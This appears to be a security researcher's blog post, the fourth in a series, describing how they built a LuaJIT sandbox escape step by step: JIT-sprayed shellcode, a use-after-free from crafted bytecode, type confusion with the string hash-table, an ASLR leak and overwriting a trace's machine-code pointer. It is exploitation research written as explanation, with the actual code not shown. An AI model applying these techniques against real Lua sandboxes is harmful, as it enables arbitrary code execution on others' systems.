Happy holidays 🕎/🎅 and (almost) happy new year!
This week I presented my LuaJIT journey at the DEFCON-Groups meetup(@dc9723):
Yesterday I shared my LuaJIT journey at @dc9723 group. Thanks for everyone who attended :D Currently working on the last blogpost of the series, which documents the exploit dev part+the thinking process behind every step I showed in the slides. Should be published soon pic.twitter.com/pKIXzSuVFI
The slides included a summary of the 3-part blog series) I published in this blog. However, there was a 4th part I still didn’t publish here and was included in the presentation. So, here it is, part 4: Crafting a fully-weaponized sandbox escape for LuaJIT! :D
Side-Note: The talk was not recorded / I didn’t publish the slides(yet, sorry). However, this blogpost is a great summary of the entire talk + it documents some technical stuff in more depth.
Exploit plan
The plan is as follows:
JIT-Spray your shellcode(explained in part3 of this series).
Achieve Use-After-Free
Leverage the UAF to get a Type-Confusion
Get leaks: Defeat ASLR
Find GCtrace->mcode pointer, overwrite its value
Jump to shellcode
Let’s go!
Use-After-Free
By default, Lua(JIT) allows you to load already-compiled Lua bytecode. This bytecode is not verified as it is considered ‘trusted’, and you can cook alot of powerful primitives by loading a specially-crafted bytecode. Previously, this mechanism was researched by Samuel Groß(@5aelo, Project Zero) in this writeup. In his blogpost, Samuel demonstrates how to leverage the LOADK instruction of Lua to load a forged TValue. It involved (a bit odd) heap shaping which I found difficult to re-produce in LuaJIT. Plus, I wanted to come up with my own strategy/exploit, so I decided to go for a MOV exploit.
In order to achieve UAF with a MOV instruction we:
Create a table (i.e: local tbl = {1337, 'foo', 'bar'})
MOV its TValue outside the virtual stack frame
Set it to nil to make the GCtab object un-reachable from the GC root
call collectgarbage()
And now we have a TValue on the virtual stack, pointing to a free’d GCtab object.
The reason we get a UAF out of the steps above is the way the Garbage Collector decides to free memory: The LuaJIT’s GC(which is based on Lua 5.1) has a Tri-Color Mark-and-Sweep algorithm. Essentially, whenever the GC traverse through the objects and mark them as grey/black it scans through the virtual stack, starting from the bottom(lua_State::stack) all the way to the top of the stack(lua_State::top):
Hence, if we MOV a TValue outside of the stack(aboveL->top) and call trigger the garbage collector(using collectgarbage()) the GCtab object pointed by this TValue will never get marked ➜ as a result, it will be free’d during the sweep phase.
What the Garbage Collector doesn’t know is that we have another copy of this TValue, waiting for us to move it back to our Lua context after the GC collection ends :) And that’s the logic behind how to achieve UAF with MOV.
At this point, the TValue is outside of the stack so we don’t have access to it in the context of our Lua script, but it shouldn’t be a problem to get it back to our script: we’ll just use RET <Our_TValue_idx>. This is exactly what exp-gen.py does when we prepare our exploit.
Type Confusion
The road to get a Type-Confusion was a bit difficult, and required some fancy engineering behind it as it was difficult to find the right structures/overlapping. But eventually I got it.
Before we get into the details, let’s set a goal: Our goal is to get a Lua table of type GCtab with a very large size(GCtab::asize) in order to get OOB r/w, and from there we’ll build our way up to a full code execution.
The data structures I chose to confuse are GCtab and the array of pointers pointed by global_State::strhash. But before we dive into this, we’ll need to know what global_State::strhash is used for and what exactly is String Interning.
Some Background on String Interning
LuaJIT implements String Interning:
In computer science, string interning is a method of storing only one copy of each distinct string value, which must be immutable. Interning strings makes some string processing tasks more time- or space-efficient at the cost of requiring more time when the string is created or interned. The distinct values are stored in a string intern pool. (Source: wikipedia)
In other words, LuaJIT maintains a hash-table pointed by global_State::strhash. This hash-table contains all of the string objects(GCstr) of a Lua program.
Every time a new string allocation request is made, a hash is calculated in order to determine whether this string has been already interned or not:
However, if the string is unique/not already exists in the hash-table, a new allocation will be made. The interesting part here is what’s happening after the allocation of the new GCstr object:
If the string hash-table is too big, it will relocate. This part caught my attention, and led me to the creation of the final, successful Type-Confusion PoC(below)
Hash-table hacking
In order to create an overlap/type-confusion between the global_State::strhash hash-table and the UAF’d GCtab object we have to do the following steps:
And in order to populate the GCtab::asize field(which determine how big is the array/Lua table) we’ll need to occupy the 6th index of the global_State::strhash hash-table. To do that, I made a tiny C program that brute-forces possible options:
All we need is to add one of those strings as a constant in our exploit script, and during the hash-table relocation, it will fall right on the 6th index:
Nice! The 6th index is occupied, which makes the asize field to have a very large value:
+we have a Null-pointer dereference at the GCtab::array field. This means that we have a relative r/w primitive starting from address 0x0. But hey, wait, if we’re starting from 0x0 that’s not a relative r/w, that’s an arbitrary r/w! To put things more clear: It means that if we print(uaf_tbl[0x40000000]) the LuaJIT interpreter will print out the value stored in address 0x40000000!(multiplied by 8, but let’s not focus on that/that’s not an issue. We’ll just divide it by 8 to cancel the multiplication).
Defeating ASLR
I’ll just paste here a screenshot from the presentation, because it really explains everything in a simple way:
Note: here I chose to leak the address of the require() function, but you can do it on any other built-in function that has a GCfuncC object.
Find the mcode pointer
In order to find the GCtrace::mcode pointer on the heap, we’ll need to find the GG_State structure on the heap:
This state object has a function pointer to lj_alloc_f at g.allocf, and couple of properties after it: it has the J.trace pointer, which points to an array that stores all of the GCtrace objects of our program(==JITed traces).
Using our leaks + arbitrary r/w primitive:
Calculate the address of lj_alloc_f
Scan through the heap in order to find this value
The moment we find it, it means we found g.allocf
Add a fixed offset of +0x308(it’s fixed because they are both part of the same GG_State structure) to reach the J.trace pointer.
Access our JITed trace object → overwrite its mcode value → win!
It was a great journey :D This is the 2nd time I researched about language interpreters internals(the 1st time was with a Zend Engine Research). At this point, I think I’m ready to face my all-time nemesis: Browsers! Stay tuned, and wish me luck.